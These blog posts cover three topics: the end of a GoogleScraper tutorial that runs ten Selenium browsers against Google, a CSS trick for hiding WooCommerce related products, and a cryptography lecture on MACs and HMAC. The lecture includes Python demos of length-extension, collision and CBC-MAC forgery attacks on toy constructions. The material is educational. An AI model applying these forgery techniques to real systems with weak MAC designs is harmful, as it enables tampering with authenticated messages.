<span class="n">Installing</span><span class="w"> </span><span class="n">setuptools</span><span class="p">,</span><span class="w"> </span><span class="n">pip</span><span class="p">,</span><span class="w"> </span><span class="n">wheel</span><span class="o">...</span><span class="n">done</span><span class="o">.</span><span class="w"></span>
</code></pre></div>
<p>Now we can activate the virtual environment and install GoogleScraper from the GitHub repository:</p>
<div class="highlight"><pre><span></span><code><span class="err">#</span><span class="w"> </span><span class="n">Activate</span><span class="w"> </span><span class="n">environment</span><span class="w"></span>
<span class="n">nikolai</span><span class="nv">@nikolai</span><span class="err">:</span><span class="o">~/</span><span class="n">projects</span><span class="o">/</span><span class="k">work</span><span class="o">/</span><span class="n">google</span><span class="o">-</span><span class="n">scraper</span><span class="o">-</span><span class="n">tutorial</span><span class="err">$</span><span class="w"> </span><span class="n">source</span><span class="w"> </span><span class="n">env</span><span class="o">/</span><span class="n">bin</span><span class="o">/</span><span class="n">activate</span><span class="w"></span>
<span class="p">(</span><span class="n">env</span><span class="p">)</span><span class="w"> </span><span class="n">nikolai</span><span class="nv">@nikolai</span><span class="err">:</span><span class="o">~/</span><span class="n">projects</span><span class="o">/</span><span class="k">work</span><span class="o">/</span><span class="n">google</span><span class="o">-</span><span class="n">scraper</span><span class="o">-</span><span class="n">tutorial</span><span class="err">$</span><span class="w"></span>
<span class="err">#</span><span class="w"> </span><span class="n">install</span><span class="w"> </span><span class="n">GoogleScraper</span><span class="w"></span>
<span class="n">pip</span><span class="w"> </span><span class="n">install</span><span class="w"> </span><span class="c1">--ignore-installed git+https://github.com/NikolaiT/GoogleScraper/</span>
</code></pre></div>
<p>Now you should be all set. If everything worked smoothly, you should see output similar to this:</p>
<div class="highlight"><pre><span></span><code>$ GoogleScraper --version
<span class="m">0</span>.2.2
</code></pre></div>
<h3>Preparation and Scraping Options</h3>
<p>We will use the Google search engine solely. We will request 10 results per page and only 1 page for each query.</p>
<p>We are going to use 10 simultaneous browser instances in selenium mode. Therefore each browser needs to scrape 100 keywords.</p>
<p>We are going to use a single IP address to test how far we can get with GoogleScraper without changing IPs.</p>
<p>As output we want a <code>json</code> file.</p>
<p>We enable caching so that we don't have to start the scraping process from scratch if something fails.</p>
<p>We will pass all configuration via a configuration file to GoogleScraper. We can create such a configuration file
with the following command:</p>
<div class="highlight"><pre><span></span><code>GoogleScraper --view-config > config.py
</code></pre></div>
<p>Now the file <code>config.py</code> is our configuration file.</p>
<p>In this file set the following variables:</p>
<div class="highlight"><pre><span></span><code>google_selenium_search_settings = False
google_selenium_manual_settings = False
do_caching = True
do_sleep = True
</code></pre></div>
<h3>The Scraping</h3>
<p>Now you are ready to scrape. Enter the following command in your terminal:</p>
<div class="highlight"><pre><span></span><code>GoogleScraper --config-file config.py -m selenium --sel-browser chrome --browser-mode normal --keyword-file list.txt -o results.json -z10
</code></pre></div>
<p>This will start 10 browser windows that begin to scrape the keywords in the provided file.</p>
<p>After about 22 minutes of scraping, I got the following <a href="/data/results.json">results in a json file</a>.
As you can see, there are results for all 1000 keywords, with 10 results per page including all links and snippets. You can now
analyze this data and make marketing decisions based on it.</p>
<p>Here is a short video of what the scraping looks like: <a href="/data/video-scraping.gif">Video of scraping</a>.</p>Hide related products on shop page in Woocommerce2018-08-30T17:12:00+02:002018-08-30T17:12:00+02:00Nikolai Tschachertag:incolumitas.com,2018-08-30:/2018/08/30/wordpress-hide-related-products-in-woocommerce/<h2>Introduction</h2>
<p>I found that many instructions and guides on the Internet describing <strong>how to hide the related products tab on the shop page</strong> are <strong>NOT WORKING!</strong></p>
<p>It's a freaking pain in the ass to hide your related products tab on your shop page. The method to actually hide related products depends on the WooCommerce theme that you are using. In this article, we are going to present a method that should work for any theme and WooCommerce version out there, because it relies on nothing but CSS.</p>
<h2>How to disable related products - Step by step guide</h2>
<p><strong>Step 1.</strong> Open the product page where your related products are shown. </p>
<p><strong>Step 2.</strong> Right-click on the related products section and choose <strong>Inspect</strong> to open the page inspector. See the picture below.</p>
<p><img src="/images/related-products-inspect.png" alt="Inspect element"/></p>
<p><strong>Step 3.</strong> Copy the class attribute of the container element that contains the related products HTML.</p>
<p><img src="/images/related-products-copy-class.png" alt="Copy css of container class"/></p>
<p><strong>Step 4.</strong> Turn the copied class attribute into a CSS selector: put a point <code>'.'</code> in front of it and replace every space <code>' '</code> with a point <code>'.'</code>. In my case, I copied <code>related related-products-wrapper product-section</code>.</p>
<p>In my case the final CSS code looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="p">.</span><span class="nc">related</span><span class="p">.</span><span class="nc">related-products-wrapper</span><span class="p">.</span><span class="nc">product-section</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">display</span><span class="p">:</span><span class="w"> </span><span class="kc">none</span><span class="w"> </span><span class="cp">!important</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
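<p>The conversion from step 4 is purely mechanical, so it can also be scripted. The small Python helper below is only an illustration; the function names are made up for this example, and it assumes plain class names that need no CSS escaping.</p>

```python
def class_attribute_to_selector(class_attribute):
    """Turn the value of an HTML class attribute into a compound CSS selector."""
    class_names = class_attribute.split()
    if not class_names:
        raise ValueError("the class attribute is empty")
    # A leading point plus a point between the class names matches elements having ALL classes.
    return "." + ".".join(class_names)


def hide_rule(class_attribute):
    """Build the CSS rule that hides every element matching the class attribute."""
    selector = class_attribute_to_selector(class_attribute)
    return selector + " {\n    display: none !important;\n}"


print(hide_rule("related related-products-wrapper product-section"))
```

<p>For the class attribute from my theme, this prints the same rule as shown above.</p>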
<p><strong>Step 5.</strong> Replace the line <code>{{YOUR CSS CODE HERE}}</code> in the following snippet with the CSS code from above:</p>
<div class="highlight"><pre><span></span><code><span class="x">add_action( 'wp_footer', 'incolumitas_add_inline_script' );</span>
<span class="x">function incolumitas_add_inline_script() {</span>
<span class="x"> ?></span>
<span class="x"> <style type="text/css"></span>
<span class="x"> {{YOUR CSS CODE HERE}}</span>
<span class="x"> </style></span>
<span class="x"> </span><span class="cp"><?php</span>
<span class="p">}</span>
</code></pre></div>
<p><strong>Step 6.</strong> Finally, paste the resulting code at the end of your theme's <code>functions.php</code>. In my case I needed to paste the following code at the end of my <code>functions.php</code>:</p>
<div class="highlight"><pre><span></span><code><span class="x">add_action( 'wp_footer', 'incolumitas_add_inline_script' );</span>
<span class="x">function incolumitas_add_inline_script() {</span>
<span class="x"> ?></span>
<span class="x"> <style type="text/css"></span>
<span class="x"> .related.related-products-wrapper.product-section {</span>
<span class="x"> display: none !important;</span>
<span class="x"> }</span>
<span class="x"> </style></span>
<span class="x"> </span><span class="cp"><?php</span>
<span class="p">}</span>
</code></pre></div>
<p>You can edit your <code>functions.php</code> in the admin menu under <strong>Appearance -> Editor</strong>.</p>
<h3>Pro tip: If you use the Autoptimize plugin</h3>
<p>You need to delete the cache of the Autoptimize plugin for the changes to take effect!</p>
<p>Let me know whether these instructions worked for you.</p>Cryptographic properties of MACs and HMACs2018-08-20T21:53:00+02:002018-08-20T22:00:00+02:00Nikolai Tschachertag:incolumitas.com,2018-08-20:/2018/08/20/cryptographic-properties-mac-and-hmac/<h2>Introduction</h2>
<p>Similar to digital signatures, <strong>Message Authentication Codes</strong> (MACs) provide message integrity and message authentication. When Alice generates a MAC and sends the message together with the MAC to Bob, Bob verifies the integrity of the message by calculating the MAC himself and comparing it with the received one. He also authenticates the message, because only someone who knows the shared secret key, that is Alice, could have generated the MAC.</p>
<p>Unlike digital signatures, however, they do not provide non-repudiation, since all involved parties share the secret key <span class="math">\(k\)</span>. MACs can be implemented using cryptographically secure hash functions (HMAC) or symmetric block ciphers like AES.</p>
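<p>The exchange between Alice and Bob can be illustrated with Python's standard <code>hmac</code> module. This is a minimal sketch: the key, the messages and the choice of SHA-256 as the underlying hash function are assumptions made for this example.</p>

```python
import hashlib
import hmac


def generate_mac(key, message):
    """Alice's side: compute the HMAC-SHA256 tag of a message."""
    return hmac.new(key, message, hashlib.sha256).digest()


def verify_mac(key, message, tag):
    """Bob's side: recompute the tag and compare it in constant time."""
    expected = generate_mac(key, message)
    return hmac.compare_digest(expected, tag)


shared_key = b"example key known to Alice and Bob"
message = b"transfer 10 EUR to Bob"
tag = generate_mac(shared_key, message)

print(verify_mac(shared_key, message, tag))                      # True
print(verify_mac(shared_key, b"transfer 1000 EUR to Bob", tag))  # False
```

<p>Since Bob can compute exactly the same tag as Alice, the tag proves nothing to a third party, which is why a MAC does not provide non-repudiation.</p>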
<p>A MAC consists of a set of messages <span class="math">\(X\)</span>, a finite set of hash values <span class="math">\(Y\)</span> and a key space <span class="math">\(K\)</span>. Each key <span class="math">\(k\)</span> specifies a hash function <span class="math">\(h_k: X \rightarrow Y\)</span>. Let <span class="math">\(n=|X|\)</span> and <span class="math">\(m=|Y|\)</span> and <span class="math">\(l=|K|\)</span>.</p>
<p>Each MAC must have a property known as <strong>computation resistance</strong>: Even if an attacker knows one or more text-hash pairs <span class="math">\((x_i, h_k(x_i))\)</span>, it remains computationally infeasible to find a valid MAC for a new message without knowledge of the used key <span class="math">\(k\)</span>.</p>
<p>The goal of an attacker is to compute a valid MAC for a message <span class="math">\(x \in X\)</span> without knowing the secret key <span class="math">\(k\)</span>. There is a series of different attack categories:</p>
<ul>
<li><strong>Impersonation: </strong>The attacker only knows which MAC is used and tries to generate a valid MAC without knowing the key <span class="math">\(k\)</span>. He tries to act like a person who owns the key.</li>
<li><strong>Substitution: </strong> The attacker knows the MAC value for one message <span class="math">\(x\)</span> and tries to find a valid MAC for another message <span class="math">\(x'\)</span> such that <span class="math">\(x' \neq x\)</span>.</li>
<li><strong>Known-text attack: </strong> The attacker knows the MAC values of a number of texts <span class="math">\(x_1, ..., x_r\)</span> that he has not chosen himself. He tries to generate a valid MAC for a new message <span class="math">\(x' \notin \{x_1, ..., x_r\}\)</span>.</li>
<li><strong>Chosen-text attack: </strong> The attacker can choose the texts <span class="math">\(x_1, ..., x_r\)</span> himself.</li>
<li><strong>Adaptive chosen-text attack: </strong> The attacker can choose each text for which he receives a MAC with knowledge of the previously received MACs.</li>
</ul>
<h2>Information Theoretic Security of MACs (After Shannon)</h2>
<p>The underlying model is that keys <span class="math">\(k\)</span> and messages <span class="math">\(x\)</span> are generated independently of each other, such that <span class="math">\(p(k \cap x) = p(k)p(x)\)</span>.</p>
<h4>Impersonation Success Probability</h4>
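<p>Let <span class="math">\(\alpha\)</span> be the probability that an attacker, Oscar, can pretend to be Alice without Bob noticing. Oscar sends a pair <span class="math">\((x, y)\)</span> and succeeds if <span class="math">\(y\)</span> is the valid MAC of <span class="math">\(x\)</span> under the key shared by Alice and Bob. Let <span class="math">\(\alpha(x,y) = p(x \rightarrow y)\)</span> be the probability that the message <span class="math">\(x\)</span> maps to the MAC value <span class="math">\(y\)</span>. This is the sum of the probabilities of all keys that map the message to that MAC value: <span class="math">\(\alpha(x,y) = \sum_{k \in K: h_k(x) = y} p(k)\)</span>. Oscar picks the best MAC value for a message, so <span class="math">\(\alpha(x) = \text{max}\{\alpha(x,y)|y \in Y\}\)</span>.</p>
<p>It is easy to see that <span class="math">\(\alpha(x) \geq \frac{1}{m}\)</span>, where <span class="math">\(m\)</span> is the size of the set of all possible MACs: the <span class="math">\(m\)</span> values <span class="math">\(\alpha(x,y)\)</span> sum to 1, so the largest of them is at least <span class="math">\(\frac{1}{m}\)</span>. When <span class="math">\(\chi\)</span> is a random variable with values in the positive real numbers, then </p>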
<div class="math">$$log(E(\chi)) \geq E(log(\chi))$$</div>
<p>Then for each <span class="math">\(MAC_h(x)=y\)</span> the following inequality holds </p>
<div class="math">$$\alpha \geq \frac{1}{2^{H(K)-H(K|X,Y)}} \geq 1/l$$</div>
<p> This inequality bounds the impersonation probability <span class="math">\(\alpha\)</span> from below in terms of the entropy <span class="math">\(H\)</span>. The lower bound becomes smaller as the key distribution becomes more uniform, that is, as <span class="math">\(H(K)\)</span> grows. The smaller the conditional entropy <span class="math">\(H(K|X,Y)\)</span>, the smaller the lower bound on <span class="math">\(\alpha\)</span> becomes. <span class="math">\(H(K|X,Y)\)</span> measures the uncertainty about the key <span class="math">\(K\)</span> that is not removed by knowing <span class="math">\(X\)</span> and <span class="math">\(Y\)</span>.</p>
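<p>The impersonation probability can be computed exhaustively for a toy MAC. The following sketch is only an illustration: the MAC <span class="math">\(h_{(a,b)}(x) = ax + b \bmod 3\)</span> with uniformly distributed keys <span class="math">\((a,b)\)</span> is an assumption chosen for this example, so that <span class="math">\(m = 3\)</span> and <span class="math">\(l = 9\)</span>. Here the maximum is taken over all messages as well as over all MAC values.</p>

```python
from fractions import Fraction
from itertools import product

MESSAGES = range(3)
TAGS = range(3)                           # m = 3 possible MAC values
KEYS = list(product(range(3), repeat=2))  # l = 9 keys k = (a, b)
KEY_PROBABILITY = Fraction(1, len(KEYS))  # uniform key distribution


def h(key, x):
    """Toy MAC: h_(a,b)(x) = a * x + b mod 3."""
    a, b = key
    return (a * x + b) % 3


def alpha_xy(x, y):
    """Probability that a randomly drawn key maps message x to MAC value y."""
    return sum(KEY_PROBABILITY for key in KEYS if h(key, x) == y)


def impersonation_probability():
    """Oscar's best chance over all pairs (x, y) he could send."""
    return max(alpha_xy(x, y) for x in MESSAGES for y in TAGS)


print(impersonation_probability())  # 1/3
```

<p>The result <span class="math">\(\frac{1}{3}\)</span> equals <span class="math">\(\frac{1}{m}\)</span>, the smallest value that any MAC with three possible MAC values can reach, and it is larger than <span class="math">\(\frac{1}{l} = \frac{1}{9}\)</span>.</p>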
<p>Entropy is a measurement of uncertainty of outcome. For example the entropy <span class="math">\(H\)</span> of <span class="math">\(n\)</span> independent coin tosses is <span class="math">\(n\)</span>, since <span class="math">\(n\)</span> coin tosses can be encoded with a bitstring of length <span class="math">\(n\)</span>. <strong>Entropy</strong> is defined over a discrete random variable <span class="math">\(X\)</span> </p>
<div class="math">$$H(X) = -\sum_{x \in X} Pr(x) \cdot \log_2(Pr(x))$$</div>
<p> Note that the logarithm of a probability is never positive, and thus the whole sum is multiplied with <span class="math">\(-1\)</span> to obtain a non-negative value.</p>
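<p>The entropy definition can be checked numerically. The following is a minimal sketch; the function name <code>entropy</code> and the example distributions are illustrative assumptions and not part of the original text.</p>

```python
import math

def entropy(probabilities):
    """Shannon entropy in bits of a discrete distribution given as a list of probabilities."""
    # Outcomes with probability 0 contribute nothing to the sum.
    return -sum(p * math.log2(p) for p in probabilities if p > 0)

# One fair coin toss: two equally likely outcomes.
fair_coin = [0.5, 0.5]

# n independent fair tosses: 2**n equally likely outcomes.
n = 4
n_tosses = [1 / 2**n] * 2**n

# A biased coin (hypothetical 90/10 split) is more predictable.
biased_coin = [0.9, 0.1]

print(entropy(fair_coin))    # 1.0
print(entropy(n_tosses))     # 4.0
print(entropy(biased_coin))  # below 1 bit
```

<p>The biased coin shows why a non-uniform distribution has less entropy than a uniform one over the same outcomes.</p>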
<p><strong>Jensen's inequality</strong> also plays a big role in information theory. Let <span class="math">\(f\)</span> be a continuous strictly concave function (like the <span class="math">\(\log\)</span> function) and let <span class="math">\(a_1, ..., a_n\)</span> be positive weights that sum to 1 (a probability distribution). Then
</p>
<div class="math">$$\sum_{i=1}^{n}a_if(x_i) \leq f(\sum_{i=1}^{n}a_ix_i)$$</div>
<p>We can derive with the above results that <span class="math">\(H(X,Y) \leq H(X)+H(Y)\)</span> with equality only if <span class="math">\(X\)</span> and <span class="math">\(Y\)</span> are <strong>independent random variables</strong>.</p>
<p>Now we can define <strong>conditional entropy</strong>. Conditional entropy <span class="math">\(H(X|Y)\)</span> measures the average amount of information about the random variable <span class="math">\(X\)</span> that is not revealed by <span class="math">\(Y\)</span>.
</p>
<div class="math">$$H(X|Y) = -\sum_{y \in Y}\sum_{x \in X}Pr(y)Pr(x|y)\log_2(Pr(x|y))$$</div>
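<p>As a small worked example, the sketch below evaluates the conditional entropy formula for a made-up joint distribution of two bits and compares it with the other entropies. The distribution <code>joint</code> and all function names are assumptions chosen for illustration.</p>

```python
import math

# Hypothetical joint distribution Pr(x, y) of two correlated bits.
joint = {(0, 0): 0.4, (0, 1): 0.1, (1, 0): 0.1, (1, 1): 0.4}

def H(probs):
    """Shannon entropy in bits."""
    return -sum(p * math.log2(p) for p in probs if p > 0)

def marginal(joint, axis):
    """Marginal distribution of X (axis=0) or Y (axis=1)."""
    out = {}
    for pair, p in joint.items():
        out[pair[axis]] = out.get(pair[axis], 0.0) + p
    return out

def conditional_entropy(joint):
    """H(X|Y) = -sum_y sum_x Pr(y) Pr(x|y) log2 Pr(x|y)."""
    p_y = marginal(joint, 1)
    total = 0.0
    for (x, y), p_xy in joint.items():
        if p_xy > 0:
            p_x_given_y = p_xy / p_y[y]
            total -= p_y[y] * p_x_given_y * math.log2(p_x_given_y)
    return total

h_x = H(marginal(joint, 0).values())
h_y = H(marginal(joint, 1).values())
h_xy = H(joint.values())
h_x_given_y = conditional_entropy(joint)

print(h_x, h_y, h_xy, h_x_given_y)
```

<p>For this distribution <span class="math">\(H(X,Y) \leq H(X)+H(Y)\)</span> holds strictly because the two bits are correlated, and <span class="math">\(H(X|Y)\)</span> equals <span class="math">\(H(X,Y)-H(Y)\)</span>.</p>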
<h4>Substitution Success Probability</h4>
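<p>Let <span class="math">\(\beta\)</span> be the substitution success probability, that is, the probability that the attacker manages to substitute an observed message <span class="math">\(x\)</span> with MAC <span class="math">\(y\)</span> by a different message <span class="math">\(x'\)</span> with a valid MAC <span class="math">\(y'\)</span>. For a fixed choice of <span class="math">\(x'\)</span> and <span class="math">\(y'\)</span> the success probability is <span class="math">\(p(x' \rightarrow y' | x \rightarrow y)\)</span>. The maximal success probability of substitution can be denoted as </p>
<div class="math">$$\beta(x,y) = \max_{x' \neq x,\, y'} p(x' \rightarrow y' | x \rightarrow y).$$</div>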
<p>The lower bound of success is the same as for <span class="math">\(\alpha\)</span>: <span class="math">\(\beta(x,y) \geq 1/m\)</span></p>
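<p>A MAC is called <strong>2-universal</strong> if for all messages <span class="math">\(x \neq x'\)</span> and all MAC values <span class="math">\(y, y'\)</span> </p>
<div class="math">$$|K(x,y,x',y')| = \frac{|K|}{m^2}$$</div>
<p> where <span class="math">\(K(x,y,x',y')\)</span> denotes the set of keys <span class="math">\(k\)</span> with <span class="math">\(h_k(x)=y\)</span> and <span class="math">\(h_k(x')=y'\)</span>. For 2-universal MACs it holds that <span class="math">\(|K| \geq m^2\)</span>. A MAC has substitution success probability <span class="math">\(\beta=\frac{1}{m}\)</span> if and only if it is 2-universal. In that case also <span class="math">\(\alpha = \frac{1}{m}\)</span>.</p>
<p>A simple example for a 2-universal MAC is <span class="math">\(h_{a,b}(x) = ax + b \mod p\)</span> where <span class="math">\((a,b) \in \mathbb{Z}_p \times \mathbb{Z}_p\)</span> and <span class="math">\(p\)</span> is prime.</p>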
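<p>The 2-universal property of this example can be verified by brute force for a small prime. The sketch below assumes that messages, MAC values and both key components are taken from <span class="math">\(\{0, ..., p-1\}\)</span>, so that <span class="math">\(m = p\)</span> and <span class="math">\(|K| = p^2\)</span>. The prime <code>p = 7</code> and the helper names are illustrative choices.</p>

```python
from itertools import product

p = 7  # small prime (assumption for the demo)

def h(a, b, x):
    """The MAC h_{a,b}(x) = a*x + b mod p."""
    return (a * x + b) % p

keys = list(product(range(p), repeat=2))  # all keys (a, b), |K| = p^2

def matching_keys(x, y, x2, y2):
    """K(x, y, x', y'): all keys that map x to y and x' to y'."""
    return [(a, b) for (a, b) in keys if h(a, b, x) == y and h(a, b, x2) == y2]

# Collect the size of K(x, y, x', y') over all x != x' and all y, y'.
counts = {
    len(matching_keys(x, y, x2, y2))
    for x, x2 in product(range(p), repeat=2) if x != x2
    for y, y2 in product(range(p), repeat=2)
}

print(counts)                # {1}
print(len(keys) // p ** 2)   # |K| / m^2 = 1
```

<p>Every combination is matched by exactly one key, because two distinct points determine a unique line modulo a prime. After seeing one pair <span class="math">\((x, y)\)</span>, each candidate <span class="math">\(y'\)</span> for another message is therefore equally likely.</p>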
<p>To obtain a MAC with compression functionality, one can use a construction such as
</p>
<div class="math">$$h_k(x) = kx = \sum_{i=1}^d k_ix_i \mod p$$</div>
<p> where <span class="math">\(d\)</span> is the length of the vectors <span class="math">\(x = (x_1,...,x_d)\)</span> and <span class="math">\(k = (k_1,...,k_d)\)</span>.</p>
<h2>HMAC</h2>
<p>Intuitively one would create a hash-based MAC in one of the following ways: <span class="math">\(MAC_k(x) = h(k||x)\)</span> or <span class="math">\(MAC_k(x) = h(x||k)\)</span>. However, both constructions suffer from weaknesses.</p>
<h3>Attack on <span class="math">\(MAC_k(x) = h(k||x)\)</span></h3>
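<p>Let's assume <span class="math">\(h\)</span> uses the Merkle-Damgård construction. Alice creates the MAC <span class="math">\(m\)</span> for a message <span class="math">\(x=x_1||...||x_n\)</span>. Because <span class="math">\(m\)</span> is the chaining value after the last block, an attacker can append an arbitrary message block <span class="math">\(x_{n+1}\)</span> to <span class="math">\(x\)</span> and obtain a valid MAC <span class="math">\(m'\)</span> for <span class="math">\(x||x_{n+1}\)</span> by applying the compression function of <span class="math">\(h\)</span> to <span class="math">\(m\)</span> and <span class="math">\(x_{n+1}\)</span>, without knowing <span class="math">\(k\)</span>. Thus the attacker can create valid MACs for extensions of any message whose MAC he already knows. The attacker controls what comes after the original message.</p>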
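<p>The following sketch illustrates this length extension attack on a toy iterated hash. It is not a real hash function: the compression function is a truncated SHA-256 used as a stand-in, there is no length padding, and all names, sizes and messages are assumptions made for the demonstration.</p>

```python
import hashlib

BLOCK = 16          # toy block size in bytes
STATE = 16          # toy chaining value size in bytes
IV = bytes(STATE)   # public all-zero IV

def compress(z, block):
    """Toy compression function: truncated SHA-256 of chaining value and block."""
    return hashlib.sha256(z + block).digest()[:STATE]

def toy_md(message):
    """Iterate the compression function over full blocks (no length padding)."""
    assert len(message) % BLOCK == 0
    state = IV
    for i in range(0, len(message), BLOCK):
        state = compress(state, message[i:i + BLOCK])
    return state

def mac(key, message):
    """The weak secret-prefix construction MAC_k(x) = h(k || x)."""
    return toy_md(key + message)

key = b"secret-key-16byt"   # known only to Alice and Bob (16 bytes)
x = b"pay 10 to Oscar."     # original message (16 bytes)
tag = mac(key, x)           # Oscar observes (x, tag)

# Oscar continues the hash chain from the observed tag, without the key.
extension = b" And 1000 more.."   # 16 bytes
forged_tag = compress(tag, extension)

print(forged_tag == mac(key, x + extension))  # True
```

<p>With real Merkle-Damgård hash functions the attacker additionally has to account for the padding block of the original message, which then becomes part of the extended message.</p>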
<h3>Attack on <span class="math">\(MAC_k(x) = h(x||k)\)</span></h3>
<p>If we find a collision for <span class="math">\(x\)</span> such that <span class="math">\(h(x)=h(x')\)</span>, then <span class="math">\(MAC_k(x) = MAC_k(x') = h(x||k) = h(x'||k)\)</span> because of the iterative nature of the Merkle-Damgård construction and because the part that follows <span class="math">\(x\)</span> and <span class="math">\(x'\)</span> (the key) is identical.</p>
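<p>This can be demonstrated on a toy iterated hash with a deliberately tiny 16 bit chaining value, so that a collision is found within seconds. The compression function (truncated SHA-256), the sizes and the key are assumptions for this sketch. The point is that the collision is found offline, without any knowledge of the key.</p>

```python
import hashlib
from itertools import count

BLOCK = 8           # toy block size in bytes
STATE = 2           # tiny 16 bit chaining value so collisions are cheap
IV = bytes(STATE)

def compress(z, block):
    """Toy compression function: truncated SHA-256."""
    return hashlib.sha256(z + block).digest()[:STATE]

def toy_md(message):
    """Iterated hash over full blocks, without length padding."""
    assert len(message) % BLOCK == 0
    state = IV
    for i in range(0, len(message), BLOCK):
        state = compress(state, message[i:i + BLOCK])
    return state

def find_collision():
    """Find two different one-block messages with the same hash (no key involved)."""
    seen = {}
    for i in count():
        msg = i.to_bytes(BLOCK, "big")
        digest = toy_md(msg)
        if digest in seen:
            return seen[digest], msg
        seen[digest] = msg

def mac(key, message):
    """The weak secret-suffix construction MAC_k(x) = h(x || k)."""
    return toy_md(message + key)

x, x2 = find_collision()
key = b"8bytekey"   # unknown to the attacker

print(x != x2, mac(key, x) == mac(key, x2))  # True True
```

<p>Once Alice authenticates <span class="math">\(x\)</span>, the same MAC is automatically valid for <span class="math">\(x'\)</span>, whatever the key is.</p>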
<h3>Better HMAC</h3>
<p>Given the weaknesses of these naive constructions, HMAC is instead defined as </p>
<div class="math">$$HMAC_k(x)=h((k \oplus \text{ opad })||h((k \oplus \text{ ipad })||x))$$</div>
<p> where the key <span class="math">\(k\)</span> is padded with zeros to match the block size <span class="math">\(b\)</span> of the hash function (RFC 2104 appends the zero bytes to the end of the key). Usually <strong>SHA-1</strong> is used as <span class="math">\(h\)</span>. The padded key is then XORed with ipad and opad, where <span class="math">\(\text{ipad}=36||...||36\)</span> and <span class="math">\(\text{opad}=5C||...||5C\)</span> are 512 bit constants that repeat the byte 0x36 (respectively 0x5C) 64 times. <span class="math">\(f = h((k \oplus \text{ ipad })||x)\)</span> is a keyed hash function that hashes arbitrarily sized inputs and <span class="math">\(g = h((k \oplus \text{ opad })||y)\)</span> takes an input of exactly 512 bit.</p>
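<p>The formula translates almost directly into code. The sketch below builds HMAC-SHA1 by hand and compares it with Python's standard <code>hmac</code> module. The function name <code>hmac_sha1</code> and the sample key and message are illustrative. Following RFC 2104, zero bytes are appended to the key and keys longer than one block are hashed first.</p>

```python
import hashlib
import hmac

def hmac_sha1(key: bytes, message: bytes) -> bytes:
    block_size = 64  # SHA-1 block size b in bytes (512 bits)
    if len(key) > block_size:
        # RFC 2104: keys longer than one block are hashed first.
        key = hashlib.sha1(key).digest()
    # Pad the key with zero bytes up to the block size.
    key = key.ljust(block_size, b"\x00")
    ipad_key = bytes(k ^ 0x36 for k in key)   # k XOR ipad
    opad_key = bytes(k ^ 0x5C for k in key)   # k XOR opad
    inner = hashlib.sha1(ipad_key + message).digest()   # f: inner keyed hash
    return hashlib.sha1(opad_key + inner).digest()      # g: outer keyed hash

key, msg = b"shared secret", b"hello Bob"
print(hmac_sha1(key, msg) == hmac.new(key, msg, hashlib.sha1).digest())  # True
```

<p>In practice one would call the library function directly. The hand-written version only serves to make the nesting of the two hash calls visible.</p>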
<p>When <span class="math">\(f\)</span> is collision resistant and <span class="math">\(g\)</span> is computation resistant, HMAC is computation resistant.</p>
<p>When there is no adaptive <span class="math">\((\epsilon_1,q+1)\)</span> collision attack on <span class="math">\(f\)</span> and no adaptive <span class="math">\((\epsilon_2,q)\)</span> forgery for <span class="math">\(g\)</span>, then there is no <span class="math">\((\epsilon_1+\epsilon_2,q+1)\)</span> forgery for the HMAC.</p>
<p>It can be proven that the HMAC construction above is secure if the underlying hash function is collision resistant. So in order to break the HMAC with this approach, one must find collisions for the underlying hash function (for example SHA-2).</p>
<h2>CBC-MAC</h2>
<p>One can also create MACs with block ciphers such as AES used in cipher block chaining (CBC) mode. MAC creation is simply the repeated encryption of each message block XORed with the result of the previous encryption (similar to the sponge construction). The initial encryption uses a random and public IV.
</p>
<div class="math">$$y_1 = e_k(x_1 \oplus IV)$$</div>
<p> to start and
</p>
<div class="math">$$y_i = e_k(x_i \oplus y_{i-1})$$</div>
<p> takes each message block <span class="math">\(x_i\)</span> and XORs it with the output of the previous round. The MAC is then the result of the last encryption: <span class="math">\(MAC_k(x) = y_n\)</span>.</p>
<p>There is an <strong>adaptive chosen text attack</strong> on a CBC-MAC when CBC-MACs are used without preprocessing. If the attacker knows the MAC values <span class="math">\(z=h_k(x)\)</span> and <span class="math">\(z'=h_k(x')\)</span> for the texts <span class="math">\(x=x_1||...||x_n\)</span> and <span class="math">\(x'=(x_{n+1} \oplus IV \oplus z)||x_{n+2}||...||x_{n+m}\)</span>, then <span class="math">\(z'\)</span> is also the valid MAC value for the message <span class="math">\(x''=x_1||...||x_{n+m}\)</span>, that is <span class="math">\(h_k(x'') = z'\)</span>.</p>
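<p>The attack can be reproduced with a few lines of code. Since the Python standard library contains no AES, the sketch below uses a truncated HMAC-SHA256 as a stand-in for the block cipher <span class="math">\(e_k\)</span> (CBC-MAC only ever encrypts, so no decryption is needed). The stand-in, the fixed public IV and all sample values are assumptions for this demonstration.</p>

```python
import hashlib
import hmac

T = 16          # block size t in bytes
IV = bytes(T)   # public IV, fixed to zero here for reproducibility

def e(key, block):
    """Stand-in for the block cipher e_k (NOT AES): truncated HMAC-SHA256."""
    return hmac.new(key, block, hashlib.sha256).digest()[:T]

def xor(a, b):
    return bytes(u ^ v for u, v in zip(a, b))

def cbc_mac(key, message):
    """y_1 = e_k(x_1 XOR IV), y_i = e_k(x_i XOR y_{i-1}), MAC = y_n."""
    assert message and len(message) % T == 0
    y = IV
    for i in range(0, len(message), T):
        y = e(key, xor(message[i:i + T], y))
    return y

key = b"k" * 16                 # secret, only used by the MAC oracle below
x = b"A" * T + b"B" * T         # x_1 || x_2
tail = b"C" * T + b"D" * T      # x_3 || x_4, the blocks Oscar wants to append

z = cbc_mac(key, x)                               # first query
x_prime = xor(tail[:T], xor(IV, z)) + tail[T:]    # (x_3 XOR IV XOR z) || x_4
z_prime = cbc_mac(key, x_prime)                   # second, adaptive query

forged_message = x + tail       # x'' = x_1 || x_2 || x_3 || x_4, never queried
print(cbc_mac(key, forged_message) == z_prime)    # True
```

<p>The XOR with <span class="math">\(IV \oplus z\)</span> makes the first encryption input of <span class="math">\(x'\)</span> identical to the input that block <span class="math">\(x_{n+1}\)</span> produces inside the longer message, so both chains continue identically.</p>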
<p>This attack is not possible if only messages with fixed lengths <span class="math">\(nt\)</span> are allowed.</p>
